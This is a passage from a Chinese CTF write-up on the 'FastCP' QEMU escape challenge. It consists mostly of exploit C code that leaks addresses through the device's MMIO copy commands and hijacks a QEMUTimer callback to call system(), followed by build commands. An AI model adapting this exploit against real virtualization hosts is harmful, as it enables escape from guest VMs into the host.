</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#0b0;font-weight:700>void</span> <span style=color:#00a000>fastcp_set_cnt</span>(<span style=color:#0b0;font-weight:700>uint64_t</span> cnt)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#00a000>mmio_write</span>(<span style=color:#666>0x10</span>, cnt);
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#0b0;font-weight:700>void</span> <span style=color:#00a000>fastcp_do_cmd</span>(<span style=color:#0b0;font-weight:700>uint64_t</span> cmd)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#00a000>mmio_write</span>(<span style=color:#666>0x18</span>, cmd);
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#080;font-style:italic>//这个fastcp_do_readfrombuffer和fastcp_mmio_read完全不一样
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic>//把buffer的数据复制到dst
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span><span style=color:#0b0;font-weight:700>void</span> <span style=color:#00a000>fastcp_do_readfrombuffer</span>(<span style=color:#0b0;font-weight:700>uint64_t</span> addr, <span style=color:#0b0;font-weight:700>uint64_t</span> len)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>//以下三个是往cp_info里面写入值
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    <span style=color:#a2f;font-weight:700>struct</span> FastCP_CP_INFO info;
</span></span><span style=display:flex><span>    info.CP_cnt <span style=color:#666>=</span> len;
</span></span><span style=display:flex><span>    info.CP_src <span style=color:#666>=</span> <span style=color:#a2f>NULL</span>;
</span></span><span style=display:flex><span>    info.CP_dst <span style=color:#666>=</span> addr;
</span></span><span style=display:flex><span>    <span style=color:#00a000>memcpy</span>(userbuf, <span style=color:#666>&amp;</span>info, <span style=color:#a2f;font-weight:700>sizeof</span>(info));
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>//以下三个是往opaque-&gt;cp_state写入值
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    <span style=color:#00a000>fastcp_set_cnt</span>(<span style=color:#666>1</span>);
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_set_list_src</span>(phy_userbuf);
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_do_cmd</span>(<span style=color:#666>4</span>);
</span></span><span style=display:flex><span>    <span style=color:#00a000>sleep</span>(<span style=color:#666>1</span>);
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#080;font-style:italic>//把src的数据复制到buffer
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span><span style=color:#0b0;font-weight:700>void</span> <span style=color:#00a000>fastcp_do_writetobuffer</span>(<span style=color:#0b0;font-weight:700>uint64_t</span> addr, <span style=color:#0b0;font-weight:700>uint64_t</span> len)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>struct</span> FastCP_CP_INFO info;
</span></span><span style=display:flex><span>    info.CP_cnt <span style=color:#666>=</span> len;
</span></span><span style=display:flex><span>    info.CP_src <span style=color:#666>=</span> addr;
</span></span><span style=display:flex><span>    info.CP_dst <span style=color:#666>=</span> <span style=color:#a2f>NULL</span>;
</span></span><span style=display:flex><span>    <span style=color:#00a000>memcpy</span>(userbuf, <span style=color:#666>&amp;</span>info, <span style=color:#a2f;font-weight:700>sizeof</span>(info));
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_set_cnt</span>(<span style=color:#666>1</span>);
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_set_list_src</span>(phy_userbuf);
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_do_cmd</span>(<span style=color:#666>2</span>);
</span></span><span style=display:flex><span>    <span style=color:#00a000>sleep</span>(<span style=color:#666>1</span>);
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#0b0;font-weight:700>void</span> <span style=color:#00a000>fastcp_do_movebuffer</span>(<span style=color:#0b0;font-weight:700>uint64_t</span> srcaddr, <span style=color:#0b0;font-weight:700>uint64_t</span> dstaddr, <span style=color:#0b0;font-weight:700>uint64_t</span> len)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>struct</span> FastCP_CP_INFO info[<span style=color:#666>0x11</span>];
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>for</span> (<span style=color:#0b0;font-weight:700>int</span> i <span style=color:#666>=</span> <span style=color:#666>0</span>; i <span style=color:#666>&lt;</span> <span style=color:#666>0x11</span>; i<span style=color:#666>++</span>)
</span></span><span style=display:flex><span>    {
</span></span><span style=display:flex><span>        info[i].CP_cnt <span style=color:#666>=</span> len;
</span></span><span style=display:flex><span>        info[i].CP_src <span style=color:#666>=</span> srcaddr;
</span></span><span style=display:flex><span>        info[i].CP_dst <span style=color:#666>=</span> dstaddr;
</span></span><span style=display:flex><span>    }
</span></span><span style=display:flex><span>    <span style=color:#00a000>memcpy</span>(userbuf, <span style=color:#666>&amp;</span>info, <span style=color:#a2f;font-weight:700>sizeof</span>(info));
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_set_cnt</span>(<span style=color:#666>0x11</span>);
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_set_list_src</span>(phy_userbuf);
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_do_cmd</span>(<span style=color:#666>1</span>);
</span></span><span style=display:flex><span>    <span style=color:#00a000>sleep</span>(<span style=color:#666>1</span>);
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#080;font-style:italic>//在qemu_main_loop中会不断执行各个函数，包括fastcp_mmio_write这个函数
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>
</span></span><span style=display:flex><span><span style=color:#0b0;font-weight:700>int</span> <span style=color:#00a000>main</span>(<span style=color:#0b0;font-weight:700>int</span> argc, <span style=color:#0b0;font-weight:700>char</span><span style=color:#666>*</span> argv[])
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>int</span> mmio_fd <span style=color:#666>=</span> <span style=color:#00a000>open</span>(<span style=color:#b44>&#34;/sys/devices/pci0000:00/0000:00:04.0/resource0&#34;</span>, O_RDWR <span style=color:#666>|</span> O_SYNC);
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>if</span> (mmio_fd <span style=color:#666>==</span> <span style=color:#666>-</span><span style=color:#666>1</span>)
</span></span><span style=display:flex><span>        <span style=color:#00a000>die</span>(<span style=color:#b44>&#34;mmio_fd open failed&#34;</span>);
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>//把刚才打开的resource0文件内容映射到一个地方
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    mmio_mem <span style=color:#666>=</span> <span style=color:#00a000>mmap</span>(<span style=color:#666>0</span>, <span style=color:#666>0x100000</span>, PROT_READ <span style=color:#666>|</span> PROT_WRITE, MAP_SHARED, mmio_fd, <span style=color:#666>0</span>);
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>if</span> (mmio_mem <span style=color:#666>==</span> MAP_FAILED)
</span></span><span style=display:flex><span>        <span style=color:#00a000>die</span>(<span style=color:#b44>&#34;mmap mmio_mem failed&#34;</span>);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#00a000>printf</span>(<span style=color:#b44>&#34;mmio_mem: %p</span><span style=color:#b62;font-weight:700>\n</span><span style=color:#b44>&#34;</span>, mmio_mem);
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>/*
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic>    MAP_ANONYMOUS 是 mmap() 函数的一个标志，用于创建匿名映射，即在进程的地址空间中映射一段未与任何文件关联的内存区域
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic>    因此有了-1这个参数
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic>    */</span>
</span></span><span style=display:flex><span>    userbuf <span style=color:#666>=</span> <span style=color:#00a000>mmap</span>(<span style=color:#666>0</span>, <span style=color:#666>0x2000</span>, PROT_READ <span style=color:#666>|</span> PROT_WRITE, MAP_SHARED <span style=color:#666>|</span> MAP_ANONYMOUS, <span style=color:#666>-</span><span style=color:#666>1</span>, <span style=color:#666>0</span>);
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>if</span> (userbuf <span style=color:#666>==</span> MAP_FAILED)
</span></span><span style=display:flex><span>        <span style=color:#00a000>die</span>(<span style=color:#b44>&#34;mmap userbuf failed&#34;</span>);
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>/*
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic>    mlock() 是一个系统调用，用于锁定指定内存区域，防止其被交换到磁盘上。
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic>    这可以确保这些内存区域的内容始终驻留在物理内存中，而不会因为系统内存不足而被交换出去。
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic>    */</span>
</span></span><span style=display:flex><span>    <span style=color:#00a000>mlock</span>(userbuf, <span style=color:#666>0x10000</span>);
</span></span><span style=display:flex><span>    phy_userbuf <span style=color:#666>=</span> <span style=color:#00a000>gva_to_gpa</span>(userbuf);
</span></span><span style=display:flex><span>    <span style=color:#00a000>printf</span>(<span style=color:#b44>&#34;user buff virtual address: %p</span><span style=color:#b62;font-weight:700>\n</span><span style=color:#b44>&#34;</span>, userbuf);
</span></span><span style=display:flex><span>    <span style=color:#00a000>printf</span>(<span style=color:#b44>&#34;user buff physical address: %p</span><span style=color:#b62;font-weight:700>\n</span><span style=color:#b44>&#34;</span>, (<span style=color:#0b0;font-weight:700>void</span><span style=color:#666>*</span>)phy_userbuf);
</span></span><span style=display:flex><span>    
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_do_readfrombuffer</span>(phy_userbuf, <span style=color:#666>0x1030</span>);
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_do_writetobuffer</span>(phy_userbuf <span style=color:#666>+</span> <span style=color:#666>0x1000</span>, <span style=color:#666>0x30</span>);
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_do_readfrombuffer</span>(phy_userbuf, <span style=color:#666>0x30</span>);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>//泄露pie,得到system函数的地址
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    <span style=color:#0b0;font-weight:700>uint64_t</span> leak_timer <span style=color:#666>=</span> <span style=color:#666>*</span>(<span style=color:#0b0;font-weight:700>uint64_t</span><span style=color:#666>*</span>)(<span style=color:#666>&amp;</span>userbuf[<span style=color:#666>0x10</span>]);
</span></span><span style=display:flex><span>    <span style=color:#00a000>printf</span>(<span style=color:#b44>&#34;leaking timer: %p</span><span style=color:#b62;font-weight:700>\n</span><span style=color:#b44>&#34;</span>, (<span style=color:#0b0;font-weight:700>void</span><span style=color:#666>*</span>)leak_timer);
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_set_cnt</span>(<span style=color:#666>1</span>);
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>uint64_t</span> pie_base <span style=color:#666>=</span> leak_timer <span style=color:#666>-</span> <span style=color:#666>0x4dce80</span>;
</span></span><span style=display:flex><span>    <span style=color:#00a000>printf</span>(<span style=color:#b44>&#34;pie_base: %p</span><span style=color:#b62;font-weight:700>\n</span><span style=color:#b44>&#34;</span>, (<span style=color:#0b0;font-weight:700>void</span><span style=color:#666>*</span>)pie_base);
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>uint64_t</span> system_plt <span style=color:#666>=</span> pie_base <span style=color:#666>+</span> <span style=color:#666>0x2C2180</span>;
</span></span><span style=display:flex><span>    <span style=color:#00a000>printf</span>(<span style=color:#b44>&#34;system_plt: %p</span><span style=color:#b62;font-weight:700>\n</span><span style=color:#b44>&#34;</span>, (<span style=color:#0b0;font-weight:700>void</span><span style=color:#666>*</span>)system_plt);
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>//堆上的某个地址
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    <span style=color:#0b0;font-weight:700>uint64_t</span> struct_head <span style=color:#666>=</span> <span style=color:#666>*</span>(<span style=color:#0b0;font-weight:700>uint64_t</span><span style=color:#666>*</span>)(<span style=color:#666>&amp;</span>userbuf[<span style=color:#666>0x18</span>]);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>struct</span> QEMUTimer timer;
</span></span><span style=display:flex><span>    <span style=color:#00a000>memset</span>(<span style=color:#666>&amp;</span>timer, <span style=color:#666>0</span>, <span style=color:#a2f;font-weight:700>sizeof</span>(timer));
</span></span><span style=display:flex><span>    timer.expire_time <span style=color:#666>=</span> <span style=color:#666>0xffffffffffffffff</span>;
</span></span><span style=display:flex><span>    timer.timer_list <span style=color:#666>=</span> <span style=color:#666>*</span>(<span style=color:#0b0;font-weight:700>uint64_t</span><span style=color:#666>*</span>)(<span style=color:#666>&amp;</span>userbuf[<span style=color:#666>0x8</span>]);
</span></span><span style=display:flex><span>    timer.cb <span style=color:#666>=</span> system_plt;
</span></span><span style=display:flex><span>    timer.opaque <span style=color:#666>=</span> struct_head <span style=color:#666>+</span> <span style=color:#666>0xa00</span> <span style=color:#666>+</span> <span style=color:#666>0x1000</span> <span style=color:#666>+</span> <span style=color:#666>0x30</span>; <span style=color:#080;font-style:italic>//这里应该是在qemu这个进程中timer.shell
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    <span style=color:#00a000>printf</span>(<span style=color:#b44>&#34;struct_head: %p</span><span style=color:#b62;font-weight:700>\n</span><span style=color:#b44>&#34;</span>,struct_head);
</span></span><span style=display:flex><span>    <span style=color:#00a000>strcpy</span>(<span style=color:#666>&amp;</span>timer.shell, <span style=color:#b44>&#34;echo flag{a_test_flag}&#34;</span>);
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>//变量仅仅在栈上或堆上是不行的，得到mmio里面去才能被qemu用
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    <span style=color:#00a000>memcpy</span>(userbuf <span style=color:#666>+</span> <span style=color:#666>0x1000</span>, <span style=color:#666>&amp;</span>timer, <span style=color:#a2f;font-weight:700>sizeof</span>(timer));
</span></span><span style=display:flex><span>    <span style=color:#080;font-style:italic>//把src复制到buffer,再把buffer复制到dst
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    <span style=color:#080;font-style:italic>//把src复制到buffer时就把整个结构体中的timer结构体给覆盖为我们自己修改后的结构体
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span>    <span style=color:#00a000>fastcp_do_movebuffer</span>(<span style=color:#00a000>gva_to_gpa</span>(userbuf <span style=color:#666>+</span> <span style=color:#666>0x1000</span>) <span style=color:#666>-</span> <span style=color:#666>0x1000</span>, <span style=color:#00a000>gva_to_gpa</span>(userbuf <span style=color:#666>+</span> <span style=color:#666>0x1000</span>) <span style=color:#666>-</span> <span style=color:#666>0x1000</span>, <span style=color:#666>0x1000</span> <span style=color:#666>+</span> <span style=color:#a2f;font-weight:700>sizeof</span>(timer));
</span></span><span style=display:flex><span>    <span style=color:#00a000>fastcp_do_cmd</span>(<span style=color:#666>1</span>);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>return</span> <span style=color:#666>0</span>;
</span></span><span style=display:flex><span>}
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:1;-o-tab-size:1;tab-size:1><code class=language-bash data-lang=bash><span style=display:flex><span>mkdir exp
</span></span><span style=display:flex><span>cp ./initramfs-busybox-x64.cpio.gz ./exp/
</span></span><span style=display:flex><span><span style=color:#a2f>cd</span> exp
</span></span><span style=display:flex><span>gunzip ./initramfs-busybox-x64.cpio.gz 
</span></span><span style=display:flex><span>cpio -idmv &lt; ./initramfs-busybox-x64.cpio
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>mkdir root
</span></span><span style=display:flex><span>cp ../exp.c ./root/
</span></span><span style=display:flex><span>gcc ./root/exp.c -o ./root/exp -static 
</span></span><span style=display:flex><span>find . | cpio -o --format<span style=color:#666>=</span>newc &gt; initramfs-busybox-x64.cpio
</span></span><span style=display:flex><span>gzip initramfs-busybox-x64.cpio
</span></span><span style=display:flex><span>cp initramfs-busybox-x64.cpio.gz ..
</span></span></code></pre></div></div><footer class=post-footer><div class=post-tags><a href=/tags/qemu-pwn>qemu pwn</a></div><div class=addthis_inline_share_toolbox style=text-align:center></div><hr><div class=reward-container><div><i class="fa-solid fa-mug-hot"></i>请我喝杯咖啡吧 ヾ(^▽^*)))</div><button>
赞赏</button><div class=post-reward><div class=post-reward-item><img src=/imgs/img-lazy-loading.gif data-src=/imgs/ali-pay.png alt="f1ow - 支付宝">
<span>支付宝</span></div><div class=post-reward-item><img src=/imgs/img-lazy-loading.gif data-src=/imgs/wechat-pay.png alt="f1ow - 微信">
<span>微信</span></div></div></div><div class=post-copyright><img src=/imgs/cc/cc.svg width=75 height=75 align=right alt=共享知识><ul><li class=post-copyright-title><strong>文章标题：</strong>
FastCP</li><li class=post-copyright-author><strong>本文作者： </strong>f1ow</li><li class=post-copyright-link><strong>本文链接：</strong>
<a id=post-cr-link href=https://zp9080.github.io/post/qemu-pwn/fastcp/ title=FastCP>https://zp9080.github.io/post/qemu-pwn/fastcp/</a></li><li class=post-copyright-license><strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <i class="fab fa-fw fa-creative-commons"></i><a target=_blank href=https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div><div class=post-nav><div class="post-nav-next post-nav-item"><a href=/post/%E5%A0%86%E6%94%BB%E5%87%BB%E6%97%A7%E7%89%88/fastbin%E9%94%99%E4%BD%8D%E6%9E%84%E9%80%A0/ rel=next title=fastbin错位构造><i class="fa fa-chevron-left"></i> fastbin错位构造</a></div><div class="post-nav-prev post-nav-item"><a href=/post/format-string/fmtstr_payload/ rel=prev title=fmtstr_payload>fmtstr_payload
<i class="fa fa-chevron-right"></i></a></div></div></footer></article></div></div></main><footer class=footer><div class=footer-inner><div class=copyright>&copy;
<span itemprop=copyrightYear>2024 - 2025
</span><span class=with-love><i class="fa fa-heart"></i>
</span><span class=author itemprop=copyrightHolder>f1ow</span></div><div class=powered-by>由 <a href=https://gohugo.io title=0.126.1 target=_blank>Hugo</a> & <a href=https://github.com/hugo-next/hugo-theme-next title=4.6.3 target=_blank>Hugo NexT.Gemini</a> 强力驱动</div><div class=beian><a href=https://beian.miit.gov.cn target=_blank>鄂ICP备 20240001号</a>
<img src=/imgs/gongan.png alt=鄂公网安备>
<a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=42010002002000" target=_blank>鄂公网安备 42010002002000 号</a></div><div class=vendors-list><a target=_blank href=https://vercel.com title=Vercel><img src=/imgs/img-lazy-loading.gif data-src=/imgs/vendors/vercel.svg alt=Vercel>
</a><a target=_blank href=https://upyun.com title=又拍云><img src=/imgs/img-lazy-loading.gif data-src=/imgs/vendors/upyun.png alt=又拍云>
</a><a target=_blank href=https://github.com title=Github><img src=/imgs/img-lazy-loading.gif data-src=/imgs/vendors/github.svg alt=Github>
</a><span>提供CDN/云资源支持</span></div></div></footer><script type=text/javascript src=https://zp9080.github.io/3rd/animejs/3.2.2/anime.min.js crossorigin=anonymous defer></script><script type=text/javascript src=https://zp9080.github.io/3rd/viewerjs/1.11.6/viewer.min.js crossorigin=anonymous defer></script><script class=next-config data-name=main type=application/json>{"bookmark":{"color":"#222","enable":true,"save":"manual"},"copybtn":true,"darkmode":false,"giscus":{"cfg":{"category":"Comments","categoryid":null,"emit":false,"inputposition":"top","mapping":"title","reactions":false,"repo":"username/repo-name","repoid":null,"theme":"preferred_color_scheme"},"js":"https://giscus.app/client.js"},"hostname":"https://zp9080.github.io/","i18n":{"ds_day":" 天前","ds_days":" 天 ","ds_hour":" 小时前","ds_hours":" 小时 ","ds_just":"刚刚","ds_min":" 分钟前","ds_mins":" 分钟","ds_month":" 个月前","ds_years":" 年 ","empty":"没有找到任何搜索结果：${query}","hits":"找到 ${hits} 个搜索结果","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","placeholder":"搜索..."},"lang":"zh-CN","lazyload":false,"localSearch":{"enable":true,"limit":1e3,"path":"/searchindexes.xml","preload":false,"topnperarticle":-1,"trigger":"auto","unescape":false},"motion":{"async":true,"enable":true,"transition":{"collheader":"fadeInLeft","postblock":"fadeIn","postbody":"fadeInDown","postheader":"fadeInDown","sidebar":"fadeInUp"}},"postmeta":{"comments":{"enable":true,"plugin":"waline"},"views":{"enable":true,"plugin":"busuanzi"}},"root":"/","scheme":"Gemini","sidebar":{"display":"post","offset":12,"padding":18,"position":"left","width":256},"vendor":{"plugins":"local","router":{"name":"local","type":"modern","url":"https://zp9080.github.io/3rd"}},"version":"4.6.3","waline":{"cfg":{"emoji":false,"imguploader":false,"placeholder":"请文明发言哟 ヾ(≧▽≦*)o","reaction":true,"reactiontext":["点赞","踩一下","得意","不屑","尴尬","睡觉"],"reactiontitle":"你认为这篇文章怎么样？","requiredmeta":["nick","mail"],"serverurl":null,"sofa":"快来发表你的意见吧 (≧∀≦)ゞ","wordlimit":200},"css":{"alias":"@waline/client","file":"dist/waline.css","name":"waline","version":"2.15.8"},"js":{"alias":"@waline/client","file":"dist/waline.js","name":"waline","version":"2.15.8"}}}</script><script type=text/javascript src=/js/main.min.befa9b7d22ec90da86c74c5dbff5ee42c12e9fc6d6f4448bfcc596cc329b19e8.js defer></script></body></html>